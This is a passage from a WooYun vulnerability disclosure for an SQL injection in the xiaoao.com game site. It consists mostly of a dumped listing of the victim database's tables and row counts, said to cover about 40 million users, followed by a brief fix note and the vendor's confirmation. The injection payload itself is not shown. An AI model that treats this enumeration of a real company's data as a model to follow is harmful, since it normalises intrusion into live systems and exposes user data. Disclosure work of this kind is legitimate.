 | game_achievement_receive_present     | 339276  |
 | bbs_user_login                       | 323663  |
 | bbs_user_phone                       | 317582  |
 | game_user_imsi_phone                 | 300039  |
 | bbs_user_zone_visit                  | 288050  |
 | game_car3d3_friend                   | 286392  |
 | download_game_3g_info                | 282398  |
 | game_user_office                     | 271886  |
 | android_ads_visit_time_old           | 262334  |
 | user_dingdan_kong                    | 243628  |
 | game_online_count                    | 237882  |
 | game_car3d3_madaoju_date             | 229164  |
 | game_android_ddz_mm_code             | 227342  |
 | yyl_present_count                    | 226939  |
 | game_achievement_playwithone         | 222571  |
 | temp_fetion_award                    | 203352  |
 | yyl_bean_note                        | 191309  |
 | wap_online                           | 186878  |
 | yyl_bean                             | 183991  |
 | game_user_show_box                   | 181096  |
 | bbs_user_bank_history                | 179865  |
 | bbs_user_prestige                    | 177271  |
 | farm_user_task                       | 168575  |
 | game_motoonline_firstcharge_gift     | 163154  |
 | android_ads_click                    | 163013  |
 | bbs_user_round_match_auth            | 155937  |
 | user_dingdan_9588                    | 150898  |
 | game_bishai_score                    | 150714  |
 | user_dingdan_cmcc2                   | 150307  |
 | bbs_user_sheng                       | 146334  |
 | cmcc_phone_province                  | 145748  |
 | game_achievement_win                 | 141768  |
 | game_faction_score_history           | 140739  |
 | bbs_privatemsg                       | 138296  |
 | beiweibeta_buytools                  | 136921  |
 | game_new_ddz_content                 | 133321  |
 | game_answer                          | 124158  |
 | bbs_user_setitems                    | 122750  |
 | union_total                          | 122594  |
 | farm_user_land                       | 117008  |
 | mobilearea                           | 116688  |
 | game_ask                             | 116087  |
 | game_car3d3_award                    | 114813  |
 | reg_good_xo                          | 114050  |
 | game_hd_bx                           | 110976  |
 | game_new_sh_award                    | 109622  |
 | game_user_history_test               | 107825  |
 | user_dw                              | 106553  |
 | game_caronlie_madaoju                | 104756  |
 | bbs_user_history                     | 101120  |
 | bbs_userprops_history                | 101115  |
 | charge_third                         | 100817  |
 | game_ad_download_apk_user            | 99403   |
 | game_user_history_total_history      | 97359   |
 | game_userscore_history               | 96636   |
 | bbs_user_activityinfo_backup         | 96395   |
 | bbs_thread                           | 95408   |
 | xomoney                              | 95275   |
 | game_faction_bbs_message             | 94239   |
 | bbs_huitie                           | 92912   |
 | farm_repository                      | 91961   |
 | bbs_user_goldbean_log                | 88690   |
 | login_log                            | 86124   |
 | user_dingdan_cmcc_chargepoint        | 84256   |
 | game_order_wo                        | 82510   |
 | game_dingdan                         | 78995   |
 | fish_paycode_new                     | 78730   |
 | th_userlog                           | 74513   |
 | page_part_visite                     | 74267   |
 | bbs_free_modifyname                  | 72877   |
 | user_zz                              | 69499   |
 | user_dw_game                         | 67623   |
 | temp_fetion_code                     | 66889   |
 | user_dingdan_wap                     | 65221   |
 | bbs_user_onlinetime5                 | 65078   |
 | zdactive_present_count               | 63445   |
 | bbs_user_sendgamemoney               | 62951   |
 | user_dingdan_parterday_close         | 62797   |
 | bbs_log                              | 59987   |
 | user_dingdan_wapc                    | 55866   |
 | download_game_wukong_info            | 54584   |
 | luck_msg                             | 51021   |
 | game_android_ddz_mm_code_temp        | 50603   |
 | game_my_xo_wq_qp                     | 49269   |
 | sendmessagelist                      | 48941   |
 | xomoney_tt                           | 48855   |
 | game_link_new3g                      | 46446   |
 | e159                                 | 43984   |
 | game_new_motoonline_award            | 43682   |
 | bbs_user_zone_message                | 43075   |
 | game_faction_money_history           | 39300   |
 | game3_download                       | 38393   |
 | yyl_present_count_temp               | 38221   |
 | user_chattextlist                    | 38030   |
 | game_car3d3_signin_log               | 37494   |
 | temp_log                             | 36439   |
 | yyl_user_click                       | 36404   |
 | bbs_colony_event                     | 32944   |
 | user_pet_online                      | 32827   |
 | game_mydumpling                      | 32460   |
 | temp_fx_au                           | 32455   |
 | farm_user_lv_award                   | 31324   |
 | farm_user_lv                         | 30048   |
 | pet                                  | 28417   |
 | yeepay_card_log                      | 26032   |
 | bbs_user_spent_gold_log_20160423     | 25357   |
 | bbs_user_spent_gold_log_20160422     | 25081   |
 | error300                             | 24614   |
 | bbs_user_spent_gold_log_20160421     | 24319   |
 | bbs_user_spent_gold_log_20160420     | 23857   |
 | e159_ua                              | 23577   |
 | bbs_user_show_commend                | 22587   |
 | bbs_user_open                        | 22305   |
 | bbs_user_robot                       | 21673   |
 | bbs_user_robot1                      | 21673   |
 | game_autocharge_shenzhouxing_temp    | 21293   |
 | game_sddz_firstcharge_gift           | 20904   |
 | city_table                           | 20825   |
 | user_dingdan_yeepay_shenzhouxing     | 20194   |
 | game_album                           | 19063   |
 | game_all_online_count                | 18926   |
 | bbs_user_money_error                 | 18759   |
 | bbs_user_blog_visit                  | 18203   |
 | game_user_stage                      | 17809   |
 | game_user_stage_content              | 17794   |
 | bbs_bookmark                         | 17698   |
 | send_grow_pet_probability            | 16930   |
 | game_winmoney_userscore              | 16709   |
 | game_winxomoney                      | 16683   |
 | bbs_user_login_black_old             | 15946   |
 | pet_grow_log                         | 15850   |
 | game_faction_user                    | 15780   |
 | user_pet                             | 15683   |
 | game_photo                           | 15630   |
 | game_paycode_general                 | 15001   |
 | user_dingdan_mm                      | 13971   |
 | yyl_vip_click                        | 13439   |
 | game_autocharge_shenzhouxing_card    | 12805   |
 | user_dingdan_yeepay                  | 12749   |
 | game_autocharge_shenzhouxing_success | 12668   |
 | bbs_user_bank                        | 12667   |
 | game_sendsms                         | 12570   |
 | bbs_colony_member                    | 12217   |
 | game_activity_present                | 12093   |
 | charm_modify_history                 | 11621   |
 | inquiry                              | 11429   |
 | hd_cs                                | 11427   |
 | game_qq_pay_phoneno                  | 11121   |
 | user_dingdan_bank                    | 10916   |
 | user_pet_old                         | 10268   |
 | bbs_user_ddzpresent                  | 9568    |
 | user_dingdan_shenzhouxing            | 9513    |
 | user_detail                          | 9200    |
 | card_new                             | 9007    |
 | game_zhifubao_code                   | 8907    |
 | game_down_list                       | 8834    |
 | game_new_ddz_match                   | 8482    |
 | game_car3d3_friend1                  | 8263    |
 | user_dingdan_goldcpa                 | 7956    |
 | game_user_dayinfo_20160423           | 7833    |
 | szf_card_dingdan                     | 7427    |
 | parter_user                          | 7330    |
 | game_user_dayinfo_20160424           | 7288    |
 | card_type                            | 7076    |
 | game_union_phone_black               | 6934    |
 | temp_playp_u                         | 6451    |
 | user_reward                          | 6258    |
 | temp_t                               | 6015    |
 | game_user_dayinfo_20160422           | 5914    |
 | bbs_user_face                        | 5815    |
 | fish_paycode                         | 5655    |
 | bbs_user_mood                        | 5556    |
 | game_user_dayinfo_20160420           | 5446    |
 | user_action_event                    | 5442    |
 | bbs_user_blog_comment                | 5435    |
 | game_user_dayinfo_20160421           | 5223    |
 | bbs_user_blog                        | 5192    |
 | user_dingdan_checkoutrecord          | 4794    |
 | bbs_user_goldbean                    | 4690    |
 | oldddz_to_newddz_log                 | 4582    |
 | bbs_user_sendgold                    | 4345    |
 | temp_ba                              | 4322    |
 | bbs_17sy_log                         | 4256    |
 | android_resolution                   | 4254    |
 | user_level                           | 4159    |
 | prize_choice_num                     | 3913    |
 | user_dingdan_partermonth_close       | 3708    |
 | user_dingdan_gold_1028_20150108      | 3594    |
 | dingdan_yn_wapfee                    | 3591    |
 | user_dingdan_yeepay_jun              | 3509    |
 | bbs_integral                         | 3495    |
 | bbs_user_spent_gold_log              | 3457    |
 | bbs_award                            | 3134    |
 | user_dingdan_month                   | 3125    |
 | hd_souhu                             | 3124    |
 | dingdan_logout_list                  | 3121    |
 | game_user_job_function               | 3048    |
 | bbs_user_face_backup                 | 2891    |
 | bbs_colony_message                   | 2803    |
 | game_faction_job                     | 2780    |
 | user_charge_send                     | 2707    |
 | fish_paycode_log                     | 2657    |
 | user_dingdan_yeepay_card             | 2637    |
 | t                                    | 2632    |
 | bbs_sellxoid_list                    | 2608    |
 | user_dingdan_19pay                   | 2547    |
 | game_user_total                      | 2545    |
 | gamearticle                          | 2508    |
 | bbs_user_charm                       | 2486    |
 | game_photo_bbs                       | 2383    |
 | mission_message                      | 2345    |
 | farm_largess_log                     | 2324    |
 | game_android_ddz_award               | 2294    |
 | game_user_bomb                       | 2278    |
 | cdkey_liuyi                          | 2200    |
 | bbs_user_zone_set                    | 2198    |
 | xomoney_t                            | 2185    |
 | upload_score                         | 2161    |
 | user_add_log                         | 2158    |
 | send_present_msg                     | 2144    |
 | bbs_colony_thread                    | 2128    |
 | game_hd_bx_click_date                | 2102    |
 | dingdan_check                        | 2064    |
 | game_album_status                    | 2063    |
 | game_save                            | 2063    |
 | game_qth_s                           | 2056    |
 | user_dingdan_95cool                  | 2014    |
 | littlefish_cdkey                     | 2000    |
 | bbs_user_match_auth                  | 1960    |
 | address_ip                           | 1940    |
 | bbs_colony_share                     | 1766    |
 | game_faction_user_function           | 1749    |
 | game_server_list                     | 1749    |
 | game_down                            | 1707    |
 | game_speaker                         | 1700    |
 | game_faction_placard                 | 1682    |
 | game_faction_user_message            | 1654    |
 | game_tanwei                          | 1649    |
 | delete_friend                        | 1641    |
 | bbs_user_chat                        | 1627    |
 | game_new_ddz_match_award             | 1610    |
 | game_user_dayinfo                    | 1570    |
 | player                               | 1508    |
 | world_cup_user                       | 1499    |
 | game_faction                         | 1485    |
 | bbs_head_log                         | 1458    |
 | bbs_user_test                        | 1369    |
 | game_bishai_table                    | 1354    |
 | game_upload_reg                      | 1351    |
 | game_user_buy_food                   | 1314    |
 | user_inquiry                         | 1250    |
 | game_union_city_black                | 1225    |
 | bbs_user_share                       | 1195    |
 | bank_remit                           | 1189    |
 | bbs_colony_photo                     | 1105    |
 | game_user_cheat                      | 1045    |
 | bbs_user_sendgold_day                | 1039    |
 | user_black_super                     | 1027    |
 | bbs_friend                           | 1005    |
 | game_farm3_award360_code             | 1000    |
 | game_zjh_code                        | 1000    |
 | game_farm3_award360                  | 990     |
 | game_user_pet_life                   | 915     |
 | temp0                                | 906     |
 | game_create_cimelia                  | 903     |
 | bbs_user_null                        | 850     |
 | game_union_province_count            | 845     |
 | www_article                          | 825     |
 | movie_list_history                   | 821     |
 | game_ddz_statistics2                 | 801     |
 | game_my_wq_qp                        | 789     |
 | inquiry_new                          | 769     |
 | game_phone_list                      | 735     |
 | game_new_ddz_award_20160421          | 717     |
 | bbs_user_subscription                | 716     |
 | temp_qq_au                           | 714     |
 | prize_week                           | 707     |
 | bbs_user_my_show                     | 706     |
 | game_faction_chat                    | 706     |
 | bbs_sellxoid                         | 703     |
 | game_winmoney_pool                   | 696     |
 | bbs_updname_log                      | 674     |
 | bishai_usexomoney                    | 665     |
 | windows_down                         | 657     |
 | game_new_ddz_award_20160422          | 653     |
 | game_new_ddz_award_20160423          | 634     |
 | user_dingdan_gold_postdbo            | 632     |
 | activity_pl3_log                     | 622     |
 | send_show_log                        | 608     |
 | game_new_ddz_award_20160424          | 603     |
 | yyl_present_count_new                | 555     |
 | farm_user_use_fertilizer             | 542     |
 | game_tuij                            | 529     |
 | game_new_ddz_award_20160420          | 528     |
 | user_report                          | 523     |
 | bbs_recommend_blog                   | 514     |
 | game_shanghai_chinajoy               | 500     |
 | game_server_list_norun               | 457     |
 | worldcup_buy                         | 420     |
 | phonetype                            | 405     |
 | bbs_user_login_fail_ip               | 404     |
 | zjh_top100_charisma                  | 400     |
 | parter_finance_setup                 | 395     |
 | game_weblink_count                   | 375     |
 | game_autocharge_shenzhouxing_config  | 351     |
 | union_bl                             | 344     |
 | bbs_share_talk                       | 341     |
 | game_my_tanwei                       | 330     |
 | chargeinfo                           | 328     |
 | bbs_user_img                         | 327     |
 | message_send                         | 324     |
 | mission_thread                       | 320     |
 | bbs_share_disk                       | 318     |
 | chargeinfo_test                      | 316     |
 | bbs_recommend_photo                  | 280     |
 | game_ad_download_apk                 | 260     |
 | union_pay                            | 255     |
 | game_speaker_count                   | 252     |
 | temperror                            | 251     |
 | dingdan_yn_wap                       | 248     |
 | fish_paycode_use_imei                | 246     |
 | game_achievement_playwith3friend     | 241     |
 | bbs_star_user                        | 238     |
 | bbs_user_colony                      | 225     |
 | game_activity_list                   | 221     |
 | game_link_count                      | 210     |
 | xo_gm_link                           | 200     |
 | zjh_top100_allmoney                  | 200     |
 | game_cmccboxmj_daoju                 | 194     |
 | user_friend_kind                     | 193     |
 | bbs_addvip                           | 191     |
 | dopod_reg                            | 191     |
 | game_new_ddz_award                   | 187     |
 | game_dingdan_new                     | 185     |
 | active_click_count                   | 184     |
 | user_dingdan_check_black             | 184     |
 | game_achievement_match_win           | 180     |
 | bbs_user_show                        | 173     |
 | basic_menu                           | 170     |
 | bbs_photo_talk                       | 169     |
 | union_pay_info                       | 167     |
 | pay_jisuan                           | 157     |
 | car3d3_gdgrps                        | 155     |
 | bbs_user_match_auth_qht              | 152     |
 | bbs_usersign                         | 151     |
 | game_bishai_umpire                   | 139     |
 | buy_show                             | 135     |
 | bbs_colony_placard                   | 127     |
 | bbs_user_day_match_auth1             | 126     |
 | bbs_user_gold_game_top               | 125     |
 | game_user_show_type                  | 122     |
 | bbs_user_goldbean_today_num          | 120     |
 | game_union_code                      | 119     |
 | bbs_attachment                       | 114     |
 | bbs_groupperm                        | 110     |
 | bbs_user_face_log                    | 101     |
 | temp_alipay_sendmoney                | 101     |
 | bbs_message_hot                      | 100     |
 | game_achievement_type                | 100     |
 | android_ads                          | 97      |
 | temp_r                               | 95      |
 | www_game_info                        | 94      |
 | buy_mingxi                           | 93      |
 | en_www_game_info                     | 93      |
 | game_cimelia_type                    | 92      |
 | bbs_user_bbs_black                   | 90      |
 | bbs_user_sns_history                 | 89      |
 | user_dingdan_month_old               | 88      |
 | www_hr_ryxx                          | 88      |
 | game                                 | 85      |
 | game_daoju_type                      | 76      |
 | buy                                  | 75      |
 | farm_plant_pic                       | 75      |
 | bbs_shajia_sell                      | 74      |
 | en_game                              | 70      |
 | temp2                                | 69      |
 | bbs_game_gifts                       | 68      |
 | user_receive_mail                    | 67      |
 | farm_product                         | 66      |
 | game_pay_fail_ip                     | 64      |
 | gamecheck                            | 64      |
 | world_cup_match                      | 64      |
 | reluserinfo                          | 59      |
 | bbs_shajia_history                   | 58      |
 | bbs_userperm                         | 58      |
 | card_type_new                        | 56      |
 | game_ask_question_type_relation      | 56      |
 | fish_paycode_use                     | 55      |
 | game_qth_day_award                   | 54      |
 | hd_klwj                              | 54      |
 | yuanbao_shua                         | 52      |
 | farm_user_lv_dictionary              | 51      |
 | game_union_17sy                      | 50      |
 | bbs_addvipinfo                       | 49      |
 | bbs_moderator                        | 48      |
 | web_wtbk                             | 47      |
 | game_union_province_limit            | 45      |
 | stop_union                           | 45      |
 | user_dingdan_gold_test               | 45      |
 | user_jiang                           | 44      |
 | game_money_type                      | 43      |
 | game_ip_address                      | 41      |
 | bbs_user_show_all                    | 40      |
 | game_car3d3_madaoju_use              | 40      |
 | test1                                | 40      |
 | user_dingdan_iava                    | 38      |
 | game_faction_pk_list                 | 37      |
 | temp4                                | 37      |
 | bbs_board                            | 35      |
 | www_autothink_lm                     | 35      |
 | www_hr                               | 34      |
 | bbs_face                             | 33      |
 | game_faction_pk                      | 33      |
 | hd_duobao                            | 33      |
 | user_pet_pic                         | 33      |
 | suggest                              | 31      |
 | dj_down                              | 30      |
 | game_wq_qp                           | 29      |
 | game_server_listex                   | 28      |
 | game_server_room_list                | 28      |
 | gamewin_mingxi                       | 28      |
 | wap_content                          | 27      |
 | game_server_listex_ophone            | 26      |
 | privilege_img_info                   | 26      |
 | test                                 | 26      |
 | farm_plant_dictionary                | 25      |
 | fish_paycode_use_imei_new            | 24      |
 | game_caronlie_madaoju_use            | 24      |
 | game_motoonlie_madaoju_use           | 24      |
 | game_name                            | 24      |
 | product_type                         | 24      |
 | bbs_user_motocarsingle               | 23      |
 | game3gmax                            | 23      |
 | game3gmaxver                         | 23      |
 | game_link_new3gname                  | 23      |
 | temp_yunnan_match_score              | 23      |
 | user_dingdan_test1                   | 23      |
 | user_tips                            | 23      |
 | user_zd_present                      | 23      |
 | prms_userprms                        | 22      |
 | power_dictionary                     | 21      |
 | union_b2                             | 21      |
 | user_power_relation                  | 21      |
 | game_server_list_memo                | 20      |
 | basic_user                           | 19      |
 | game_type                            | 19      |
 | bbs_bbsnews                          | 18      |
 | game_infor                           | 18      |
 | www_autothink_content                | 18      |
 | contact                              | 17      |
 | game_apk_info_union                  | 17      |
 | bbs_game_propsinfo                   | 16      |
 | beiweibeta_charge                    | 16      |
 | singlegame_ask                       | 16      |
 | dj_down_total_user                   | 15      |
 | en_www_article                       | 15      |
 | system_lv_dictionary                 | 15      |
 | game_apk_info                        | 14      |
 | game_intro_pic                       | 14      |
 | farm_task                            | 13      |
 | fixturenum                           | 13      |
 | user_send_mail                       | 13      |
 | zd_present                           | 13      |
 | game_server_listex_iava              | 12      |
 | movie_list                           | 12      |
 | privilege_img_configs                | 12      |
 | user_dingpiao_movie                  | 12      |
 | bbs_colony_type                      | 11      |
 | prize_luck_num                       | 11      |
 | temp_ddz_zbs                         | 11      |
 | bbs_user_action                      | 10      |
 | game_cmccboxmj_daoju_show            | 10      |
 | good_xo                              | 10      |
 | privilege_img_config                 | 10      |
 | apple_login_sendmoney                | 9       |
 | farm_product_type                    | 9       |
 | question                             | 9       |
 | upload_score2                        | 9       |
 | user_tips_type                       | 9       |
 | yyl_present                          | 9       |
 | beiweibeta_tools                     | 8       |
 | game_office                          | 8       |
 | game_scoreintegral                   | 8       |
 | game_user_honor                      | 8       |
 | union_kou                            | 8       |
 | android_imei_game                    | 7       |
 | bbs_user_goldbean_phone              | 7       |
 | farm_land_lv_dictionary              | 7       |
 | game_real_server_new                 | 7       |
 | game_vip_type                        | 7       |
 | pet_active_get                       | 7       |
 | user_pet_active_type                 | 7       |
 | yyl_present_new                      | 7       |
 | bbs_user_gold_game                   | 6       |
 | farm_fertilizer                      | 6       |
 | game_faction_function                | 6       |
 | game_group                           | 6       |
 | game_real_server_android_old         | 6       |
 | game_server_room_list_test           | 6       |
 | t_random_image                       | 6       |
 | union_danji                          | 6       |
 | `3g_game_bbs`                        | 5       |
 | ddz_charge_filer                     | 5       |
 | game_cimelia_charm                   | 5       |
 | game_real_server                     | 5       |
 | game_real_server_old                 | 5       |
 | otherinfo                            | 5       |
 | t_userdir                            | 5       |
 | user_pet_grow_condition              | 5       |
 | web_xtpz                             | 5       |
 | bbs_color                            | 4       |
 | bbs_user_indulge                     | 4       |
 | en_t_random_image                    | 4       |
 | game_daoju_type_list                 | 4       |
 | game_group_iava                      | 4       |
 | game_union                           | 4       |
 | gamechat                             | 4       |
 | inquiry_user                         | 4       |
 | system_mode_dictionary               | 4       |
 | temp1                                | 4       |
 | user_dingdan_zytx                    | 4       |
 | bbs_user_prestige_history            | 3       |
 | ddz_activity_info                    | 3       |
 | game_answer_score                    | 3       |
 | game_car3d3_supertrack               | 3       |
 | game_cmcc_mj_faction_user            | 3       |
 | game_union_companion                 | 3       |
 | superplayer                          | 3       |
 | union_zc_fc_bl                       | 3       |
 | activeinfo                           | 2       |
 | bbs_advertisement                    | 2       |
 | bbs_vote                             | 2       |
 | game_group_mm                        | 2       |
 | phone_test                           | 2       |
 | prize_pool                           | 2       |
 | push_9588                            | 2       |
 | question_type                        | 2       |
 | user_mail_address                    | 2       |
 | activty_info                         | 1       |
 | bbs_boardcommunity                   | 1       |
 | bbs_config                           | 1       |
 | bbs_user_login_fail                  | 1       |
 | beiweibeta_set                       | 1       |
 | check_server                         | 1       |
 | clientversion                        | 1       |
 | game_bbs                             | 1       |
 | game_bbs_3g                          | 1       |
 | game_bbs_3g_box                      | 1       |
 | game_bbs_box                         | 1       |
 | game_daoju_product                   | 1       |
 | game_ddz_statistics                  | 1       |
 | game_hd_bx_click                     | 1       |
 | game_pet_food                        | 1       |
 | game_replaceword                     | 1       |
 | game_server_room_list_close          | 1       |
 | game_switch                          | 1       |
 | game_switch_test                     | 1       |
 | game_version                         | 1       |
 | game_zjh_xyc                         | 1       |
 | game_zjh_xyc_set                     | 1       |
 | game_zjh_xyc_user_xz                 | 1       |
 | gamedaojuservletid                   | 1       |
 | gameinfo                             | 1       |
 | luck_time                            | 1       |
 | prize_luck_config                    | 1       |
 | send_message_test                    | 1       |
 | user_dingdan_charge                  | 1       |
 | user_dingdan_cmcc                    | 1       |
 | user_dingdan_km                      | 1       |
 | usercheckservletuid                  | 1       |
 | win                                  | 1       |
 | yyl_click_count                      | 1       |
 | zd_count_dictionary                  | 1       |
 +--------------------------------------+---------+

这里是33644129用户信息+论坛6183532 也就4000w

修复方案：

过滤参数

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-04-28 15:18

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-18 15:33 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

0

跑了2天终于跑完了..

1# 回复此人

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2016-200866

漏洞标题： 游戏安全之小奥游戏某漏洞涉及4000w用户信息

相关厂商： xiaoao.com

漏洞作者： 黑色键盘丶

提交时间： 2016-04-28 13:32

公开时间： 2016-06-12 15:20

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(9) 关注此漏洞

漏洞标题：游戏安全之小奥游戏某漏洞涉及4000w用户信息

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：厂商已经确认

Tags标签：注射技巧

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分